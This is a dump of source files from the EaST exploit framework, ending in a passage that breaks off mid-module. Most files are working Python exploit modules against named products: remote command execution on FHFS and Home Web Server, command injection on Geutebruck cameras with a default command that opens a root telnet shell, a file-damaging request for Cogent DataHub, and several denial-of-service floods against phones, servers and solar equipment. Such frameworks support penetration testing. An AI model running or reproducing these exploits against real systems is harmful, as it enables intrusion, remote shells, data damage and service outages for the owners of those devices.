https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/data/CVE-2015-8103/serialized_payload_footer -------------------------------------------------------------------------------- /data/CVE-2015-8103/serialized_payload_header: -------------------------------------------------------------------------------- 1 | <===[JENKINS REMOTING CAPACITY]===> -------------------------------------------------------------------------------- /data/report_templates/common.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Report 6 | 30 | 31 | 32 |
33 |

Server was started at: %s

34 |

Succeeded modules: %s

35 |

Failed modules: %s

36 |
37 | %s 38 | 39 | -------------------------------------------------------------------------------- /data/report_templates/row_template.html: -------------------------------------------------------------------------------- 1 |
2 |
Name: {MODULE_NAME} ({IS_SUCCESS})
3 |
Description:
{DESCRIPTION} 4 |
Notes:
{NOTES} 5 | {OPTIONS} 6 | {LISTENER} 7 |
Module out:
{LOG} 8 | 9 |
Cve: {CVE}
10 |
11 |
12 |
-------------------------------------------------------------------------------- /docs/files/template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | #IMPORTS SECTION 4 | from collections import OrderedDict # for rigth options order 5 | from Sploit import Sploit # base class for module 6 | #INFO SECTION 7 | INFO = {} 8 | INFO['NAME'] = '' # Module name 9 | INFO['DESCRIPTION'] = '' # Short description of vulnerability 10 | INFO['VENDOR'] = '' # Vulnerable soft vendor's homepage 11 | INFO['CVE Name'] = '' # CVE if exists(like 2017-9999) 12 | INFO['NOTES'] = """ """ # Full description of vulnerability 13 | INFO['DOWNLOAD_LINK'] = '' # Link to vulnerable soft 14 | INFO['LINKS'] = [] # Some helpful links(like exploit's page on exploit-db or link to some article) 15 | INFO['CHANGELOG'] = '' # Usually it's exploit writing date 16 | INFO['PATH'] = 'General/' # Virtual path of module. It used by module tree in GUI 17 | 18 | # OPTIONS SECTION 19 | OPTIONS = OrderedDict() 20 | OPTIONS['HOST'] = '127.0.0.1' 21 | OPTIONS['PORT'] = 9999 22 | 23 | 24 | class exploit(Sploit): 25 | def __init__(self,host="", 26 | port=0, ssl=False, 27 | logger=None): 28 | Sploit.__init__(self, logger=logger) 29 | 30 | def args(self): 31 | self.args = Sploit.args(self, OPTIONS) 32 | 33 | def run(self): 34 | #Get options from gui 35 | self.args() 36 | #YOUR CODE 37 | 38 | ########## 39 | self.finish(True) 40 | 41 | 42 | if __name__ == '__main__': 43 | print "Running exploit %s .. " % INFO['NAME'] 44 | e = exploit("192.168.0.1", 80) 45 | e.run() 46 | -------------------------------------------------------------------------------- /docs/files/vulnserver_bof/vulnserver.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/docs/files/vulnserver_bof/vulnserver.jpg -------------------------------------------------------------------------------- /docs/files/vulnserver_bof/vulnserver2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/docs/files/vulnserver_bof/vulnserver2.jpg -------------------------------------------------------------------------------- /docs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | EaST Tutorials 5 | 6 | 7 | 8 | 9 |
10 |
Bootstrap test
11 |
12 | Bootstrap test 13 |
14 |
15 | 16 | 17 | -------------------------------------------------------------------------------- /exploits/ef_cogento_datahub_afd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # The exploit is a part of EaST pack - use only under the license agreement 3 | # specified in LICENSE.txt in your EaST distribution 4 | 5 | import sys 6 | import time 7 | import urllib2 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | 12 | INFO = {} 13 | INFO['NAME'] = "ef_cogento_datahub_fd" 14 | INFO['DESCRIPTION'] = "Cogento DataHub =< v.7.3.9.364 File Damager Exploit" 15 | INFO['VENDOR'] = "http://www.cogentdatahub.com" 16 | INFO["CVE Name"] = "" 17 | INFO["NOTES"] = """ 18 | The exploit allows to damage any file at victim system by dumping data to it. Cogento DataHub v.7.3.9.364. Windows XP SP3.""" 19 | 20 | INFO['CHANGELOG'] = "07 Sep, 2015. Written by Gleg team." 21 | INFO['PATH'] = 'Exploits/' 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = {} 25 | OPTIONS["HOST"] = "127.0.0.1" 26 | OPTIONS["PORT"] = "80" 27 | OPTIONS["FILENAME"] = 'c:/boot.ini' 28 | 29 | class exploit(Sploit): 30 | def __init__(self, host = "", port = 0, logger = None): 31 | Sploit.__init__(self, logger = logger) 32 | self.name = INFO['NAME'] 33 | self.port = port 34 | self.host = host 35 | self.filename = None 36 | self.state = "running" 37 | return 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | self.filename = self.args.get('FILENAME', 'c:/boot.ini') 44 | return 45 | 46 | def make_url(self, path = ''): 47 | return 'http://{}:{}{}'.format(self.host, self.port, path) 48 | 49 | def run(self): 50 | self.args() 51 | self.log('Try do damage file: {}'.format(self.filename)) 52 | 53 | stage1 = self.make_url('/Silverlight/GetPermissions.asp?username=nil nil)(dump {}&password=') 54 | stage1 = stage1.format(self.filename).replace(' ', '%20') 55 | 56 | try: 57 | req = urllib2.urlopen(stage1).read() 58 | self.log('Success!') 59 | self.finish(True) 60 | return 1 61 | except Exception as ex: 62 | self.log('Failed!') 63 | print ex 64 | self.finish(False) 65 | return 0 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool mode for exploit.. 70 | Later we would have standalone mode also. 71 | """ 72 | print "Running exploit %s .. " % INFO['NAME'] 73 | e = exploit("192.168.0.1", 80) 74 | e.run() -------------------------------------------------------------------------------- /exploits/ef_fhfs_rce.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import socket 7 | 8 | sys.path.append("./core") 9 | from Sploit import Sploit 10 | 11 | INFO = {} 12 | INFO['NAME'] = "ef_fhfs_rce" 13 | INFO['DESCRIPTION'] = "FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution" 14 | INFO['VENDOR'] = "http://sourceforge.net/projects/fhfs/" 15 | INFO['DOWNLOAD_LINK'] = 'http://sourceforge.net/projects/fhfs/' 16 | INFO['LINKS'] = 'https://www.exploit-db.com/exploits/37985/' 17 | INFO["CVE Name"] = "" 18 | INFO["NOTES"] = """ 19 | FHFS is a FTP and HTTP Web Server package, transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website, good for schools, businesses, etc. whose students/employees need to easily transport files. 20 | """ 21 | INFO['CHANGELOG'] = "08 Sep 2015. Written by Gleg team." 22 | INFO['PATH'] = 'Exploits/General/' 23 | 24 | # Must be in every module, to be set by framework 25 | OPTIONS = {} 26 | OPTIONS["HOST"] = "127.0.0.1" 27 | OPTIONS["PORT"] = "80" 28 | OPTIONS["CMD"] = 'stop.bat' 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host = "", port = 0, logger = None): 32 | Sploit.__init__(self, logger = logger) 33 | self.name = INFO['NAME'] 34 | self.cmd = OPTIONS['CMD'] 35 | self.host = host 36 | self.port = port 37 | self.state = "running" 38 | return 39 | 40 | def args(self): 41 | self.args = Sploit.args(self, OPTIONS) 42 | self.host = self.args.get('HOST', self.host) 43 | self.port = int(self.args.get('PORT', self.port)) 44 | self.cmd = self.args.get('CMD', self.cmd) 45 | return 46 | 47 | def run(self): 48 | self.args() 49 | 50 | client = socket.socket() 51 | try: 52 | client.connect((self.host, self.port)) 53 | data = "GET /?{.exec|" + self.cmd + ".} HTTP/1.1\r\n\r\n" 54 | client.send(data) 55 | client.close() 56 | self.log('Success. Command executed') 57 | self.finish(True) 58 | return 1 59 | except: 60 | self.log('Failed') 61 | self.finish(False) 62 | return 0 63 | 64 | if __name__ == '__main__': 65 | """ 66 | By now we only have the tool mode for exploit.. 67 | Later we would have standalone mode also. 68 | """ 69 | print "Running exploit %s .. " % INFO['NAME'] 70 | e = exploit("192.168.0.1", 80) 71 | e.run() -------------------------------------------------------------------------------- /exploits/efa_aastra_6755i_SIP_SP4_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import os 6 | import sys 7 | 8 | import urllib2 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_aastra_6755i_SIP_SP4_dos" 15 | INFO['DESCRIPTION'] = "Aastra 6755i SIP SP4 - Unauthorized Remote Reboot" 16 | INFO['VENDOR'] = "http://www.aastra.sg/" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/44142/'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """Unauthorized Remote Reboot by simple GET request 21 | """ 22 | 23 | INFO['CHANGELOG'] = "19 Feb, 2018. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/Hardware/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Target IP') 29 | OPTIONS["PORT"] = 8181, dict(description = 'Target PORT') 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host = "", port = 0, logger = None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | self.ssl = False 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | self.host = self.args.get('HOST', self.host) 43 | 44 | def make_url(self, path = ''): 45 | return '{}{}:{}{}'.format(self.prot(), self.host, self.port, path) 46 | 47 | def prot(self): 48 | return self.ssl and 'https://' or 'http://' 49 | 50 | #def check(self): 51 | # u = self.make_url('/crashlog.html') 52 | 53 | def run(self): 54 | self.args() 55 | self.log("Attacking {}".format(self.host)) 56 | 57 | url = self.make_url('/confirm.html') 58 | try: 59 | fd = urllib2.urlopen(url) 60 | except Exception as e: 61 | self.log(e) 62 | 63 | self.finish(True) 64 | 65 | if __name__ == '__main__': 66 | """ 67 | By now we only have the tool mode for exploit.. 68 | Later we would have standalone mode also. 69 | """ 70 | 71 | print "Running exploit %s .. " % INFO['NAME'] 72 | e = exploit('', 80) 73 | e.run() 74 | -------------------------------------------------------------------------------- /exploits/efa_autodesk_backburner_manager_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | import time 10 | 11 | sys.path.append('./core') 12 | from Sploit import Sploit 13 | 14 | INFO = {} 15 | INFO['NAME'] = "efa_autodesk_backburner_manager_dos" 16 | INFO['DESCRIPTION'] = "Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service" 17 | INFO['VENDOR'] = "" 18 | INFO['DOWNLOAD_LINK'] = 'https://www.exploit-db.com/apps/dbb06aaacacf59ba0415c4dca0b1dba6-Backburner2016.0.0_2150_WIN.zip' 19 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41160/'] 20 | INFO["CVE Name"] = "" 21 | INFO["NOTES"] = """ 22 | """ 23 | INFO['CHANGELOG'] = "27 Jan, 2016. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/Dos/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 29 | OPTIONS["PORT"] = 3234, dict(description = 'Target port') 30 | 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | return 44 | 45 | def run(self): 46 | self.args() 47 | self.log("") 48 | 49 | packet = "set data\r\n" 50 | 51 | s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 52 | #s1.settimeout(1) 53 | try: 54 | s1.connect((self.host, self.port)) 55 | self.log(s1.recv(4096)) 56 | self.log(s1.recv(4096)) 57 | time.sleep(1) 58 | self.log('Send malicious packet') 59 | s1.sendall(packet) 60 | s1.close() 61 | except Exception as e: 62 | self.log(e) 63 | self.finish(False) 64 | 65 | self.finish(True) 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool mode for exploit.. 70 | Later we would have standalone mode also. 71 | """ 72 | 73 | print "Running exploit %s .. " % INFO['NAME'] 74 | e = exploit('', 80) 75 | e.run() 76 | -------------------------------------------------------------------------------- /exploits/efa_blueiris_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | 10 | sys.path.append('./core') 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_blueiris_dos" 15 | INFO['DESCRIPTION'] = "BlueIris 4.5.1.4 - Denial of Service" 16 | INFO['VENDOR'] = "http://blueirissoftware.com" 17 | INFO['DOWNLOAD_LINK'] = 'http://blueirissoftware.com/blueiris.exe' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41474/'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """This module start fake FTP server. Create FTP connection in the software. Use the "Test" button to trigger the vulnerability. 21 | """ 22 | INFO['CHANGELOG'] = "01 Mar, 2017. Written by Gleg team." 23 | INFO['PATH'] = 'Exploits/Dos/' 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = {} 27 | #OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 28 | OPTIONS["PORT"] = 21, dict(description = 'Target port') 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host = "", port = 0, logger = None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | #self.host = self.args.get('HOST', self.host) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | 43 | def run(self): 44 | self.args() 45 | packet = 'A' * 5000 46 | 47 | s = socket.socket() 48 | s.bind(('0.0.0.0', self.port)) 49 | s.listen(5) 50 | 51 | self.log('Wait incoming connection to port {}'.format(self.port)) 52 | conn, addr = s.accept() 53 | conn.send('220 ' + packet + '\r\n') 54 | conn.recv(1024) 55 | conn.send('250 ' + packet + '\r\n') 56 | conn.close() 57 | 58 | self.finish(True) 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only have the tool mode for exploit.. 63 | Later we would have standalone mode also. 64 | """ 65 | 66 | print "Running exploit %s .. " % INFO['NAME'] 67 | e = exploit('', 80) 68 | e.run() 69 | -------------------------------------------------------------------------------- /exploits/efa_conext_combox_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | import struct 10 | 11 | sys.path.append('./core') 12 | from Sploit import Sploit 13 | 14 | INFO = {} 15 | INFO['NAME'] = "efa_conext_combox_dos" 16 | INFO['DESCRIPTION'] = "Conext ComBox 865-1058 - Denial of Service" 17 | INFO['VENDOR'] = "http://solar.schneider-electric.com/product/conext-combox/" 18 | INFO['DOWNLOAD_LINK'] = '' 19 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41537/'] 20 | INFO["CVE Name"] = "CVE-2017-6019" 21 | INFO["NOTES"] = """The exploit cause the device to self-reboot, constituting a denial of service. Affected all firmware versions prior to V3.03 BN 830 22 | """ 23 | INFO['CHANGELOG'] = "07 Mar, 2017. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/Dos/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 29 | OPTIONS["PORT"] = 80, dict(description = 'Target port') 30 | 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | return 44 | 45 | def run(self): 46 | self.args() 47 | self.log("Attacking {}".format(self.host)) 48 | 49 | data = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In" 50 | for i in xrange(1, 1000): 51 | try: 52 | s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 53 | s1.connect((self.host, self.port)) 54 | self.log('Send malicious packet') 55 | s1.send("POST /" + data + " HTTP/1.1\r\n") 56 | s1.send("Host: " + self.host + "\r\n\r\n") 57 | s1.close() 58 | except Exception as e: 59 | pass 60 | 61 | self.finish(True) 62 | 63 | if __name__ == '__main__': 64 | """ 65 | By now we only have the tool mode for exploit.. 66 | Later we would have standalone mode also. 67 | """ 68 | 69 | print "Running exploit %s .. " % INFO['NAME'] 70 | e = exploit('', 80) 71 | e.run() 72 | -------------------------------------------------------------------------------- /exploits/efa_easycom_for_php_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | 10 | sys.path.append('./core') 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_easycom_for_php_dos" 15 | INFO['DESCRIPTION'] = "EasyCom For PHP 4.0.0 - Denial of Service" 16 | INFO['VENDOR'] = "easycom-aura.com" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41426/'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via 21 | HTTP requests fed to the "D$EVAL" parameter. 22 | """ 23 | INFO['CHANGELOG'] = "27 Feb, 2016. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/Dos/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 29 | OPTIONS["PORT"] = 7078, dict(description = 'Target port') 30 | 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | 44 | def run(self): 45 | self.args() 46 | packet = 'A' * 43000 47 | 48 | sockets = [] 49 | i = 0 50 | 51 | while True: 52 | try: 53 | sockets.append(socket.create_connection((self.host, self.port))) 54 | sockets[i].send('GET /?D$EVAL=' + packet + " HTTP/1.1\r\n\r\n") 55 | i += 1 56 | self.log('Data sent') 57 | except socket.error as e: 58 | self.log(e) 59 | break 60 | self.finish(True) 61 | 62 | if __name__ == '__main__': 63 | """ 64 | By now we only have the tool mode for exploit.. 65 | Later we would have standalone mode also. 66 | """ 67 | 68 | print "Running exploit %s .. " % INFO['NAME'] 69 | e = exploit('', 80) 70 | e.run() 71 | -------------------------------------------------------------------------------- /exploits/efa_extraputty_tftp_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | import socket 9 | import struct 10 | 11 | sys.path.append('./core') 12 | from Sploit import Sploit 13 | 14 | INFO = {} 15 | INFO['NAME'] = "efa_extraputty_tftp_dos" 16 | INFO['DESCRIPTION'] = "ExtraPuTTY 0.29-RC2 - Denial of Service" 17 | INFO['VENDOR'] = "http://www.extraputty.com" 18 | INFO['DOWNLOAD_LINK'] = '' 19 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41639/'] 20 | INFO["CVE Name"] = "" 21 | INFO["NOTES"] = """ TFTP server component of ExtraPuTTY is vulnerable to remote Denial of Service attack by sending large junk UDP 22 | Read/Write TFTP protocol request packets 23 | """ 24 | INFO['CHANGELOG'] = "21 Mar, 2017. Written by Gleg team." 25 | INFO['PATH'] = 'Exploits/Dos/' 26 | 27 | # Must be in every module, to be set by framework 28 | OPTIONS = {} 29 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 30 | OPTIONS["PORT"] = 69, dict(description = 'Target port') 31 | 32 | 33 | class exploit(Sploit): 34 | def __init__(self, host = "", port = 0, logger = None): 35 | Sploit.__init__(self, logger = logger) 36 | self.name = INFO['NAME'] 37 | self.port = port 38 | self.host = host 39 | 40 | def args(self): 41 | self.args = Sploit.args(self, OPTIONS) 42 | self.host = self.args.get('HOST', self.host) 43 | self.port = int(self.args.get('PORT', self.port)) 44 | 45 | def run(self): 46 | self.args() 47 | self.log("Attacking {}".format(self.host)) 48 | 49 | payload = '\x00\x01' + 'A' * 2000 + '\x00netascii\x00' 50 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 51 | try: 52 | s.sendto("\x00\x01\TEST\x00\netascii\x00", (self.host, self.port)) 53 | recv = s.recvfrom(255) 54 | if recv != None: 55 | self.log("Send payload to ExtraPuTTY TFTP server") 56 | s.sendto(payload, (self.host, self.port)) 57 | except Exception as e: 58 | self.log('Server not available') 59 | self.finish(False) 60 | self.finish(True) 61 | 62 | if __name__ == '__main__': 63 | """ 64 | By now we only have the tool mode for exploit.. 65 | Later we would have standalone mode also. 66 | """ 67 | 68 | print "Running exploit %s .. " % INFO['NAME'] 69 | e = exploit('', 80) 70 | e.run() 71 | -------------------------------------------------------------------------------- /exploits/efa_geuterbruck_g_cam_rce.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import urllib2 7 | import base64 8 | from time import sleep 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_geuterbruck_g_cam_rce" 15 | INFO['DESCRIPTION'] = "Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution" 16 | INFO['VENDOR'] = "http://geutebruck.com" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/41360/', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-045-02'] 19 | INFO["CVE Name"] = "2017-5173" 20 | INFO["NOTES"] = """Vulnerability exists in the /uapi-cgi/viewer/testaction.cgi page and allows an anonymous user to execute arbitrary commands with root privileges. Firmware <= 1.11.0.12 are concerned.""" 21 | 22 | INFO['CHANGELOG'] = "16 Feb, 2017. Written by Gleg team." 23 | INFO['PATH'] = 'Exploits/Hardware/' 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = {} 27 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 28 | OPTIONS["PORT"] = "80", dict(description = 'Target port') 29 | OPTIONS["COMMAND"] = 'utelnetd -l /bin/sh -p 4444 -d', dict(description = 'Command') 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host="", port=0, logger=None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | self.command = "" 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | self.command = self.args.get('COMMAND', self.command) 44 | 45 | 46 | def make_url(self, path = ''): 47 | return 'http://{}:{}{}'.format(self.host, self.port, path) 48 | 49 | def run(self): 50 | self.args() 51 | 52 | data = 'type=ip&ip=eth0 1.1.1.1;' + self.command 53 | request = urllib2.Request(self.make_url('/uapi-cgi/viewer/testaction.cgi'), data) 54 | 55 | self.log('Sending packet ...') 56 | try: 57 | fd = urllib2.urlopen(request) 58 | self.log(fd.read()) 59 | except Exception as e: 60 | self.log(e) 61 | self.finish(False) 62 | 63 | self.finish(True) 64 | 65 | if __name__ == '__main__': 66 | """ 67 | By now we only have the tool mode for exploit.. 68 | Later we would have standalone mode also. 69 | """ 70 | print "Running exploit %s .. " % INFO['NAME'] 71 | e = exploit("192.168.0.1", 80) 72 | e.run() 73 | 74 | -------------------------------------------------------------------------------- /exploits/efa_home_web_server_rce.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import socket 7 | 8 | sys.path.append("./core") 9 | from Sploit import Sploit 10 | 11 | INFO = {} 12 | INFO['NAME'] = "efa_home_web_server_rce" 13 | INFO['DESCRIPTION'] = "Home Web Server 1.9.1 build 164 - Remote Code Execution" 14 | INFO['VENDOR'] = "http://downstairs.dnsalias.net/" 15 | INFO['DOWNLOAD_LINK'] = 'https://www.exploit-db.com/apps/6713ded59ae078c0539cc93cec5e102d-HomeWebServerInstall.exe' 16 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42128/'] 17 | INFO["CVE Name"] = "" 18 | INFO["NOTES"] = """ 19 | Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal, it is possible to run any executable being on the remote host. 20 | """ 21 | INFO['CHANGELOG'] = "06 Jun 2017. Written by Gleg team." 22 | INFO['PATH'] = 'Exploits/General/' 23 | 24 | # Must be in every module, to be set by framework 25 | OPTIONS = {} 26 | OPTIONS["HOST"] = "127.0.0.1" 27 | OPTIONS["PORT"] = "80" 28 | OPTIONS["CMD"] = 'Windows/system32/calc.exe' 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host = "", port = 0, logger = None): 32 | Sploit.__init__(self, logger = logger) 33 | self.name = INFO['NAME'] 34 | self.cmd = OPTIONS['CMD'] 35 | self.host = host 36 | self.port = port 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get('HOST', self.host) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | self.cmd = self.args.get('CMD', self.cmd) 43 | 44 | def run(self): 45 | self.args() 46 | 47 | packet = 'POST /cgi-bin/../../../../../../../../{} HTTP/1.1\r\n\r\n'.format(self.cmd) 48 | 49 | try: 50 | s = socket.socket() 51 | s.connect((self.host, self.port)) 52 | s.sendall(packet) 53 | self.log(s.recv(4096).strip()) 54 | s.close() 55 | except Exception as e: 56 | self.log(e) 57 | self.finish(False) 58 | 59 | self.log('Success!') 60 | self.finish(True) 61 | 62 | if __name__ == '__main__': 63 | """ 64 | By now we only have the tool mode for exploit.. 65 | Later we would have standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1", 80) 69 | e.run() -------------------------------------------------------------------------------- /exploits/efa_humax_hg100r_cd.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import urllib2 7 | import base64 8 | import struct 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_humax_hg100r_cd" 15 | INFO['DESCRIPTION'] = "Humax HG100R 2.0.6 - Backup File Download" 16 | INFO['VENDOR'] = "http://humaxdigital.com" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42284/'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """Humax HG100R backup file download""" 21 | 22 | INFO['CHANGELOG'] = "03 Jul, 2017. Written by Gleg team." 23 | INFO['PATH'] = 'Exploits/Hardware/' 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = {} 27 | OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') 28 | OPTIONS["PORT"] = 80, dict(description = 'Target port') 29 | #OPTIONS["COMMAND"] = '', dict(description = 'Command') 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host="", port=0, logger=None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | # self.command = "" 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get('HOST', self.host) 42 | self.port = int(self.args.get('PORT', self.port)) 43 | # self.command = self.args.get('COMMAND', self.command) 44 | 45 | 46 | def make_url(self, path = ''): 47 | return 'http://{}:{}{}'.format(self.host, self.port, path) 48 | 49 | def run(self): 50 | self.args() 51 | 52 | url = 